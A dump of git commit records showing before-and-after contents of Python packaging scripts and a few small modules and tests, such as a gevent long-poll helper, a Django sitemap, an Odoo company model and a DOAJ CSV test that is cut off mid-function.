d9d3ae4a1d4007a0aa1dafe09102cb7414c338db | Remove extracting HG revision from setup.py. | setup.py | setup.py | from setuptools import setup
long_description = (open('README.rst').read() +
open('CHANGES.rst').read() +
open('TODO.rst').read())
def _static_files(prefix):
return [prefix+'/'+pattern for pattern in [
'markitup/*.*',
'markitup/sets/*/*.*',
'markitup/sets/*/images/*.png',
'markitup/skins/*/*.*',
'markitup/skins/*/images/*.png',
'markitup/templates/*.*'
]]
setup(
name='django-markitup',
version='2.2.2.post0',
description='Markup handling for Django using the MarkItUp! universal markup editor',
long_description=long_description,
author='Carl Meyer',
author_email='carl@oddbird.net',
url='http://bitbucket.org/carljm/django-markitup/',
packages=['markitup', 'markitup.templatetags'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Framework :: Django',
],
zip_safe=False,
test_suite='runtests.runtests',
tests_require='Django>=1.3',
package_data={'markitup': ['templates/markitup/*.html'] +
_static_files('static')}
)
| from setuptools import setup
import subprocess
import os.path
try:
# don't get confused if our sdist is unzipped in a subdir of some
# other hg repo
if os.path.isdir('.hg'):
p = subprocess.Popen(['hg', 'parents', r'--template={rev}\n'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if not p.returncode:
fh = open('HGREV', 'wb')
fh.write(p.communicate()[0].splitlines()[0])
fh.close()
except (OSError, IndexError):
pass
try:
hgrev = open('HGREV').read()
except IOError:
hgrev = ''
long_description = (open('README.rst').read() +
open('CHANGES.rst').read() +
open('TODO.rst').read())
def _static_files(prefix):
return [prefix+'/'+pattern for pattern in [
'markitup/*.*',
'markitup/sets/*/*.*',
'markitup/sets/*/images/*.png',
'markitup/skins/*/*.*',
'markitup/skins/*/images/*.png',
'markitup/templates/*.*'
]]
setup(
name='django-markitup',
version='2.2.2.post%s' % hgrev,
description='Markup handling for Django using the MarkItUp! universal markup editor',
long_description=long_description,
author='Carl Meyer',
author_email='carl@oddbird.net',
url='http://bitbucket.org/carljm/django-markitup/',
packages=['markitup', 'markitup.templatetags'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Framework :: Django',
],
zip_safe=False,
test_suite='runtests.runtests',
tests_require='Django>=1.3',
package_data={'markitup': ['templates/markitup/*.html'] +
_static_files('static')}
)
| Python | 0 |
b82dee62e325d83f8aeaede406de24973ee42b42 | Update project url in setup.py | setup.py | setup.py | #!/usr/bin/env python
#
# Copyright 2010 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(name='closure_linter',
version='2.3.17',
description='Closure Linter',
license='Apache',
author='The Closure Linter Authors',
author_email='opensource@google.com',
url='https://github.com/google/closure-linter',
install_requires=['python-gflags'],
package_dir={'closure_linter': 'closure_linter'},
packages=['closure_linter', 'closure_linter.common'],
entry_points = {
'console_scripts': [
'gjslint = closure_linter.gjslint:main',
'fixjsstyle = closure_linter.fixjsstyle:main'
]
}
)
| #!/usr/bin/env python
#
# Copyright 2010 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(name='closure_linter',
version='2.3.17',
description='Closure Linter',
license='Apache',
author='The Closure Linter Authors',
author_email='opensource@google.com',
url='http://code.google.com/p/closure-linter',
install_requires=['python-gflags'],
package_dir={'closure_linter': 'closure_linter'},
packages=['closure_linter', 'closure_linter.common'],
entry_points = {
'console_scripts': [
'gjslint = closure_linter.gjslint:main',
'fixjsstyle = closure_linter.fixjsstyle:main'
]
}
)
| Python | 0 |
45a7a979d687b75851d3901171b826faa965389e | Add setup script | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
setup(name='ambra',
version='0.1dev',
description='Temporal prediction by pairwise comparisons',
packages=['ambra'],
)
| Python | 0.000001 | |
20a5ccf55c9292d3c360a34d190e583b84594a37 | Add zeeman energy tests. | pyoommf/test_zeeman.py | pyoommf/test_zeeman.py | from zeeman import Zeeman
def test_zeeman_mif():
H = (0.1, -0.5, -8.9e6)
zeeman = Zeeman(H)
mif_string = zeeman.get_mif()
lines = mif_string.split('\n')
assert 'Specify Oxs_FixedZeeman {' in lines[0]
assert '{ Oxs_UniformVectorField {' in lines[1]
assert 'vector' in lines[2]
line2 = lines[2].split()
assert float(line2[1][1:]) == H[0]
assert float(line2[2]) == H[1]
assert float(line2[3][0:-1]) == H[2]
def test_zeeman_formatting():
H = (0.1, -0.5, -8.9e6)
zeeman = Zeeman(H)
mif_string = zeeman.get_mif()
assert mif_string[0] == 'S'
assert mif_string[-1] == '\n'
assert mif_string[-2] == '\n'
| Python | 0 | |
331aecb334f4e4ff4c38b4a2b12d3a80d7327de1 | Remove unused URL from setup.py | setup.py | setup.py | #! /usr/bin/python
# Copyright (C) 2007-2010 Michael Foord & the mock team
# E-mail: fuzzyman AT voidspace DOT org DOT uk
# http://www.voidspace.org.uk/python/mock/
from mock import __version__
from distutils.core import setup
import os
NAME = 'mock'
MODULES = ['mock']
DESCRIPTION = 'A Python Mocking and Patching Library for Testing'
URL = "http://www.voidspace.org.uk/python/mock/"
readme = os.path.join(os.path.dirname(__file__), 'README.txt')
LONG_DESCRIPTION = open(readme).read()
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 2.4',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Testing',
]
AUTHOR = 'Michael Foord'
AUTHOR_EMAIL = 'michael@voidspace.org.uk'
KEYWORDS = "testing test mock mocking unittest patching stubs fakes doubles".split(' ')
setup(
name=NAME,
version=__version__,
py_modules=MODULES,
# metadata for upload to PyPI
author=AUTHOR,
author_email=AUTHOR_EMAIL,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
keywords=KEYWORDS,
url=URL,
classifiers=CLASSIFIERS,
) | #! /usr/bin/python
# Copyright (C) 2007-2010 Michael Foord & the mock team
# E-mail: fuzzyman AT voidspace DOT org DOT uk
# http://www.voidspace.org.uk/python/mock/
from mock import __version__
from distutils.core import setup
import os
NAME = 'mock'
MODULES = ['mock']
DESCRIPTION = 'A Python Mocking and Patching Library for Testing'
URL = "http://www.voidspace.org.uk/python/mock/"
'http://www.voidspace.org.uk/downloads/mock-%s.zip' % __version__
readme = os.path.join(os.path.dirname(__file__), 'README.txt')
LONG_DESCRIPTION = open(readme).read()
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 2.4',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Testing',
]
AUTHOR = 'Michael Foord'
AUTHOR_EMAIL = 'michael@voidspace.org.uk'
KEYWORDS = "testing test mock mocking unittest patching stubs fakes doubles".split(' ')
setup(
name=NAME,
version=__version__,
py_modules=MODULES,
# metadata for upload to PyPI
author=AUTHOR,
author_email=AUTHOR_EMAIL,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
keywords=KEYWORDS,
url=URL,
classifiers=CLASSIFIERS,
) | Python | 0.000001 |
98b2114199b04678cd41e25deb9a3478e0f76e45 | say hello to python 3.3 | setup.py | setup.py | # -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.
import os
from setuptools import setup, find_packages, Command
import sys
from gunicorn import __version__
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Environment :: Other Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Topic :: Internet',
'Topic :: Utilities',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: WSGI',
'Topic :: Internet :: WWW/HTTP :: WSGI :: Server',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content']
# read long description
with open(os.path.join(os.path.dirname(__file__), 'README.rst')) as f:
long_description = f.read()
# read dev requirements
fname = os.path.join(os.path.dirname(__file__), 'requirements_dev.txt')
with open(fname) as f:
tests_require = list(map(lambda l: l.strip(), f.readlines()))
class PyTest(Command):
user_options = [
("cov", None, "measure coverage")
]
def initialize_options(self):
self.cov = None
def finalize_options(self):
pass
def run(self):
import sys,subprocess
basecmd = [sys.executable, '-m', 'py.test']
if self.cov:
basecmd += ['--cov', 'gunicorn']
errno = subprocess.call(basecmd + ['tests'])
raise SystemExit(errno)
setup(
name = 'gunicorn',
version = __version__,
description = 'WSGI HTTP Server for UNIX',
long_description = long_description,
author = 'Benoit Chesneau',
author_email = 'benoitc@e-engura.com',
license = 'MIT',
url = 'http://gunicorn.org',
classifiers = CLASSIFIERS,
zip_safe = False,
packages = find_packages(exclude=['examples', 'tests']),
include_package_data = True,
tests_require = tests_require,
cmdclass = {'test': PyTest},
entry_points="""
[console_scripts]
gunicorn=gunicorn.app.wsgiapp:run
gunicorn_django=gunicorn.app.djangoapp:run
gunicorn_paster=gunicorn.app.pasterapp:run
[gunicorn.workers]
sync=gunicorn.workers.sync:SyncWorker
eventlet=gunicorn.workers.geventlet:EventletWorker
gevent=gunicorn.workers.ggevent:GeventWorker
gevent_wsgi=gunicorn.workers.ggevent:GeventPyWSGIWorker
gevent_pywsgi=gunicorn.workers.ggevent:GeventPyWSGIWorker
tornado=gunicorn.workers.gtornado:TornadoWorker
[gunicorn.loggers]
simple=gunicorn.glogging:Logger
[paste.server_runner]
main=gunicorn.app.pasterapp:paste_server
"""
)
| # -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.
import os
from setuptools import setup, find_packages, Command
import sys
from gunicorn import __version__
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Environment :: Other Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Internet',
'Topic :: Utilities',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: WSGI',
'Topic :: Internet :: WWW/HTTP :: WSGI :: Server',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content']
# read long description
with open(os.path.join(os.path.dirname(__file__), 'README.rst')) as f:
long_description = f.read()
# read dev requirements
fname = os.path.join(os.path.dirname(__file__), 'requirements_dev.txt')
with open(fname) as f:
tests_require = list(map(lambda l: l.strip(), f.readlines()))
class PyTest(Command):
user_options = [
("cov", None, "measure coverage")
]
def initialize_options(self):
self.cov = None
def finalize_options(self):
pass
def run(self):
import sys,subprocess
basecmd = [sys.executable, '-m', 'py.test']
if self.cov:
basecmd += ['--cov', 'gunicorn']
errno = subprocess.call(basecmd + ['tests'])
raise SystemExit(errno)
setup(
name = 'gunicorn',
version = __version__,
description = 'WSGI HTTP Server for UNIX',
long_description = long_description,
author = 'Benoit Chesneau',
author_email = 'benoitc@e-engura.com',
license = 'MIT',
url = 'http://gunicorn.org',
classifiers = CLASSIFIERS,
zip_safe = False,
packages = find_packages(exclude=['examples', 'tests']),
include_package_data = True,
tests_require = tests_require,
cmdclass = {'test': PyTest},
entry_points="""
[console_scripts]
gunicorn=gunicorn.app.wsgiapp:run
gunicorn_django=gunicorn.app.djangoapp:run
gunicorn_paster=gunicorn.app.pasterapp:run
[gunicorn.workers]
sync=gunicorn.workers.sync:SyncWorker
eventlet=gunicorn.workers.geventlet:EventletWorker
gevent=gunicorn.workers.ggevent:GeventWorker
gevent_wsgi=gunicorn.workers.ggevent:GeventPyWSGIWorker
gevent_pywsgi=gunicorn.workers.ggevent:GeventPyWSGIWorker
tornado=gunicorn.workers.gtornado:TornadoWorker
[gunicorn.loggers]
simple=gunicorn.glogging:Logger
[paste.server_runner]
main=gunicorn.app.pasterapp:paste_server
"""
)
| Python | 0.999756 |
d00f9fd43cfc45747a9479f00db5d67fda658e55 | Add initial distutils configuration | setup.py | setup.py | # Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""distutils configuration."""
__author__ = 'tstromberg@google.com (Thomas Stromberg)'
from namebench import VERSION
from distutils.core import setup
setup(name='namebench',
version=VERSION,
py_modules=['namebench'],
description='DNS service benchmarking tool',
author='Thomas Stromberg',
author_email='tstromberg@google.com',
url='http://namebench.googlecode.com/',
packages=('libnamebench',),
platforms=('Any',),
requires=['graphy', 'dnspython', 'jinja2'],
license='Apache 2.0',
scripts=['namebench.py'],
package_data = {'libnamebench': ['data/alexa-top-10000-global.txt',
'templates/ascii.tmpl',
'templates/html.tmpl',
'namebench.cfg']},
# package_data=[('data', ['data/alexa-top-10000-global.txt']),
# ('templates', ['templates/ascii.tmpl',
# 'templates/html.tmpl']),
# ('config', ['namebench.cfg'])]
)
| Python | 0.000001 | |
8439263d6ff66e659a8051d3efc0475020048629 | update v.# make tag and set to release | setup.py | setup.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# (C) 2013-2014 முத்தையா அண்ணாமலை
# open-tamil project
from distutils.core import setup
from codecs import open
setup(name='Open-Tamil',
version='0.2.8',
description='Tamil language text processing tools',
author='M. Annamalai, T. Arulalan,',
author_email='ezhillang@gmail.com',
url='https://github.com/arcturusannamalai/open-tamil',
packages=['tamil','transliterate','ngram'],
license='GPLv3',
platforms='PC,Linux,Mac',
classifiers='Natural Language :: Tamil',
long_description=open('README.md','r','UTF-8').read(),
download_url='https://github.com/arcturusannamalai/open-tamil/archive/latest.zip',#pip
)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# (C) 2013-2014 முத்தையா அண்ணாமலை
# open-tamil project
from distutils.core import setup
from codecs import open
setup(name='Open-Tamil',
version='0.2.4',
description='Tamil language text processing tools',
author='Muthiah Annamalai',
author_email='ezhillang@gmail.com',
url='https://github.com/arcturusannamalai/open-tamil',
packages=['tamil','transliterate','ngram'],
license='GPLv3',
platforms='PC,Linux,Mac',
classifiers='Natural Language :: Tamil',
long_description=open('README.md','r','UTF-8').read(),
download_url='https://github.com/arcturusannamalai/open-tamil/archive/latest.zip',#pip
)
| Python | 0 |
c75ee6a0ee2f542463b5ca8cb81b06a6a6650d4c | Add initial setup file | setup.py | setup.py | from setuptools import setup
setup(
name='python2-consul',
packages=['python2-consul'],
version='0.0.1',
install_requires=[
'certifi==2017.4.17',
'chardet==3.0.4',
'idna==2.5',
'PyYAML==3.12',
'requests==2.18.1',
'urllib3==1.21.1',
'validators==0.12.0',
'pytest==3.2.2'
]
)
| Python | 0.000001 | |
af2effaf147b8e473f7b9c655842617a91414278 | Upgrade the requirement on taskotron-python-versions to include latest changes in shared functions | setup.py | setup.py |
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
def finalize_options(self):
super().finalize_options()
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
requires = [
'sqlalchemy >= 1.0, < 2.0',
'PyYAML >= 3.11, < 4.0',
'click >= 3.3, < 7.0',
'flask >= 0.10, < 1.0',
'markdown >= 2.4, < 3.0',
'dogpile.cache >= 0.5.5, < 1.0',
'taskotron-python-versions >= 0.1.dev2',
]
tests_require = ['pytest']
setup_args = dict(
name='portingdb',
version='0.1',
packages=['portingdb'],
url='https://github.com/fedora-python/portingdb',
description="""Database of packages that need Python 3 porting""",
author='Petr Viktorin',
author_email='pviktori@redhat.com',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
install_requires=requires,
tests_require=tests_require,
cmdclass={'test': PyTest},
)
if __name__ == '__main__':
setup(**setup_args)
|
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
def finalize_options(self):
super().finalize_options()
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
requires = [
'sqlalchemy >= 1.0, < 2.0',
'PyYAML >= 3.11, < 4.0',
'click >= 3.3, < 7.0',
'flask >= 0.10, < 1.0',
'markdown >= 2.4, < 3.0',
'dogpile.cache >= 0.5.5, < 1.0',
'taskotron-python-versions',
]
tests_require = ['pytest']
setup_args = dict(
name='portingdb',
version='0.1',
packages=['portingdb'],
url='https://github.com/fedora-python/portingdb',
description="""Database of packages that need Python 3 porting""",
author='Petr Viktorin',
author_email='pviktori@redhat.com',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
install_requires=requires,
tests_require=tests_require,
cmdclass={'test': PyTest},
)
if __name__ == '__main__':
setup(**setup_args)
| Python | 0 |
47b2e9890a0f3022ffbbf83a6e722b2e77e3443b | Fix dajax setup.py | setup.py | setup.py | from distutils.core import setup
setup(
name='django-dajax',
version='0.9',
author='Jorge Bastida',
author_email='me@jorgebastida.com',
description=('Easy to use library to create asynchronous presentation '
'logic with django and dajaxice'),
url='http://dajaxproject.com',
license='BSD',
packages=['dajax'],
package_data={'dajax': ['static/dajax/*']},
long_description=('dajax is a powerful tool to easily and super-quickly '
'develop asynchronous presentation logic in web '
'applications using python and almost no JS code. It '
'supports up to four of the most popular JS frameworks: '
'jQuery, Prototype, Dojo and mootols.'),
install_requires=[
'django-dajaxice>=0.5'
],
classifiers=['Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Utilities']
)
| from distutils.core import setup
setup(
name='django-dajax',
version='0.9',
author='Jorge Bastida',
author_email='me@jorgebastida.com',
description=('Easy to use library to create asynchronous presentation '
'logic with django and dajaxice'),
url='http://dajaxproject.com',
license='BSD',
packages=['dajax'],
package_data={'dajax': ['static/*']},
long_description=('dajax is a powerful tool to easily and super-quickly '
'develop asynchronous presentation logic in web '
'applications using python and almost no JS code. It '
'supports up to four of the most popular JS frameworks: '
'jQuery, Prototype, Dojo and mootols.'),
install_requires=[
'django-dajaxice>=0.5'
],
classifiers=['Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Utilities']
)
| Python | 0.000003 |
330650e7fe7c1a9aa0178812d08af332e927fe98 | add minimal setup.py | setup.py | setup.py | from setuptools import setup
setup(name='Cohorte Micronode',
version='0.9',
description='Cohorte Micronode Repository',
url='https://github.com/librallu/cohorte-herald',
author='Luc Libralesso',
author_email='libralesso.l@gmail.com',
license='Apache License 2.0',
packages=[],
zip_safe=False)
| Python | 0.000001 | |
a90162a43e4e1817bd818b66e4ad6e377ab8af92 | Update the setup.py version. | setup.py | setup.py | from distutils.core import setup
import sys
requires = ['feedgenerator', 'jinja2', 'pygments']
if sys.version_info < (2,7):
requires.append('argparse')
setup(
name = "pelican",
version = '1.2',
url = 'http://hg.lolnet.org/pelican/',
author = 'Alexis Metaireau',
author_email = 'alexis@notmyidea.org',
description = "A tool to generate a static blog, with restructured text input files.",
long_description=open('README.rst').read(),
packages = ['pelican'],
package_data = {'pelican': ['themes/templates/*']},
requires = requires,
scripts = ['bin/pelican'],
classifiers = ['Development Status :: 5 - Production/Stable',
'Environment :: Console',
'License :: OSI Approved :: GNU Affero General Public License v3',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
| from distutils.core import setup
import sys
requires = ['feedgenerator', 'jinja2', 'pygments']
if sys.version_info < (2,7):
requires.append('argparse')
setup(
name = "pelican",
version = '1.1.1',
url = 'http://hg.lolnet.org/pelican/',
author = 'Alexis Metaireau',
author_email = 'alexis@notmyidea.org',
description = "A tool to generate a static blog, with restructured text input files.",
long_description=open('README.rst').read(),
packages = ['pelican'],
package_data = {'pelican': ['themes/templates/*']},
requires = requires,
scripts = ['bin/pelican'],
classifiers = ['Development Status :: 5 - Production/Stable',
'Environment :: Console',
'License :: OSI Approved :: GNU Affero General Public License v3',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
| Python | 0 |
06c67a7df4e2fd5cbc221f2a9c3f64179af91344 | Add setup.py | setup.py | setup.py | from setuptools import setup, find_packages
setup(
name='django-exadmin',
version='0.1.0',
description='New style and free plugin django admin module, UI base bootstrap2.',
author='TM (sshwsfc)',
author_email='sshwsfc@gmail.com',
url='http://github.com/sshwsfc/django-exadmin',
download_url='',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Framework :: Django',
]
)
| Python | 0.000001 | |
2c874c09e7bf35a0ea6a7a5029c9b17ec5f057af | Fix mongoengine version. | setup.py | setup.py | from setuptools import setup, find_packages
import mongonaut
LONG_DESCRIPTION = open('README.rst').read()
setup(
name='django-mongonaut',
version=mongonaut.__version__,
description="An introspective interface for Django and MongoDB",
long_description=LONG_DESCRIPTION,
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Framework :: Django",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: JavaScript",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
"Topic :: Software Development :: Libraries :: Python Modules",
],
keywords='mongodb,django',
author=mongonaut.__author__,
author_email='pydanny@gmail.com',
url='http://github.com/pydanny/django-mongonaut',
license='MIT',
packages=find_packages(),
include_package_data=True,
install_requires=['mongoengine>=0.5.2'],
zip_safe=False,
)
| from setuptools import setup, find_packages
import mongonaut
LONG_DESCRIPTION = open('README.rst').read()
setup(
name='django-mongonaut',
version=mongonaut.__version__,
description="An introspective interface for Django and MongoDB",
long_description=LONG_DESCRIPTION,
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Framework :: Django",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: JavaScript",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
"Topic :: Software Development :: Libraries :: Python Modules",
],
keywords='mongodb,django',
author=mongonaut.__author__,
author_email='pydanny@gmail.com',
url='http://github.com/pydanny/django-mongonaut',
license='MIT',
packages=find_packages(),
include_package_data=True,
install_requires=['mongoengine==0.5.2'],
zip_safe=False,
)
| Python | 0 |
ccbb7e11edc63a128b7006e015539fdabd8f3a7f | Set up frontend for longpolling | bitHopper/LongPoll.py | bitHopper/LongPoll.py | from gevent.event import AsyncResult
_event = AsyncResult()
def wait():
"""
Gets the New Block work unit to send to clients
"""
return _event.get()
def trigger(work):
"""
Call to trigger a LP
"""
old = self._event
self._event = event.AsyncResult()
old.set(work)
| Python | 0 | |
34ad457ab831173efd3758af926deb17daf53feb | Add sitemap | resources/sitemaps.py | resources/sitemaps.py | from django.contrib.sitemaps import Sitemap
from resources.models import Resource
from django.utils import translation
class ResourceSitemap(Sitemap):
def items(self):
return Resource.objects.filter(noindex=False, is_published=True,
language=translation.get_language())
def lastmod(self, obj):
return obj.modified
| Python | 0.000002 | |
67cca3176d1e2b5def3ebbd64f4bd56a8976529b | add res.company file | l10n_br_sale/res_company.py | l10n_br_sale/res_company.py | # -*- encoding: utf-8 -*-
###############################################################################
# #
# Copyright (C) 2014 Renato Lima - Akretion #
# #
#This program is free software: you can redistribute it and/or modify #
#it under the terms of the GNU Affero General Public License as published by #
#the Free Software Foundation, either version 3 of the License, or #
#(at your option) any later version. #
# #
#This program is distributed in the hope that it will be useful, #
#but WITHOUT ANY WARRANTY; without even the implied warranty of #
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
#GNU Affero General Public License for more details. #
# #
#You should have received a copy of the GNU Affero General Public License #
#along with this program. If not, see <http://www.gnu.org/licenses/>. #
###############################################################################
from openerp import models, fields
class ResCompany(models.Model):
_inherit = 'res.company'
sale_fiscal_category_id = fields.Many2one(
'l10n_br_account.fiscal.category', u'Categoria Fiscal Padrão Compras',
domain="[('journal_type', '=', 'sale')]")
| Python | 0.000001 | |
a562aa0ac58b2ee4fec3f9ff0b70a595db4c48ad | add test case for csv validation, with first test already implemented | doajtest/unit/test_reapp_csv_validate.py | doajtest/unit/test_reapp_csv_validate.py | from doajtest.helpers import DoajTestCase
from portality.clcsv import ClCsv
from portality import reapplication
from copy import deepcopy
import os
APPLICATION_COL = [
"The Title",
"http://journal.url",
"Alternative Title",
"1234-5678",
"9876-5432",
"The Publisher",
"Society Institution",
"Platform Host Aggregator",
"Contact Name",
"contact@email.com",
"contact@email.com",
"US",
"Yes",
2,
"GBP",
"Yes",
4,
"USD",
16,
"http://articles.last.year",
"Yes",
"http://waiver.policy",
"LOCKSS, CLOCKSS, A national library, Other",
"Trinity",
"A safe place",
"http://digital.archiving.policy",
"Yes",
"DOI, ARK, Other",
"PURL",
"Yes",
"Yes",
"http://download.stats",
1980,
"HTML, XML, Other",
"Wordperfect",
"word, key",
"EN, FR",
"http://editorial.board",
"Open peer review",
"http://review.process",
"http://aims.scope",
"http://author.instructions",
"Yes",
"http://plagiarism.screening",
8,
"http://oa.statement",
"Yes",
"http://licence.embedded",
"Other",
"CC MY",
"BY, NC",
"http://licence.url",
"Yes",
"Sherpa/Romeo, Other",
"Store it",
"Other",
"Sometimes",
"http://copyright",
"Other",
"Occasionally",
"http://publishing.rights"
]
class TestReAppCsv(DoajTestCase):
def setUp(self):
super(TestReAppCsv, self).setUp()
self._make_valid_csv()
self._random_binary()
def tearDown(self):
super(TestReAppCsv, self).tearDown()
if os.path.exists("valid.csv"):
os.remove("valid.csv")
if os.path.exists("random_binary"):
os.remove("random_binary")
def _make_valid_csv(self):
sheet = ClCsv("valid.csv")
# first column is the questions
qs = reapplication.Suggestion2QuestionXwalk.question_list()
sheet.set_column("", qs)
# add 3 columns of results for testing purposes
c1 = deepcopy(APPLICATION_COL)
c1[0] = "First Title"
c1[3] = "1234-5678"
c1[4] = "9876-5432"
sheet.set_column(c1[3], c1)
c2 = deepcopy(APPLICATION_COL)
c2[0] = "Second Title"
c2[3] = "2345-6789"
c2[4] = "8765-4321"
sheet.set_column(c2[3], c2)
c3 = deepcopy(APPLICATION_COL)
c3[0] = "Third Title"
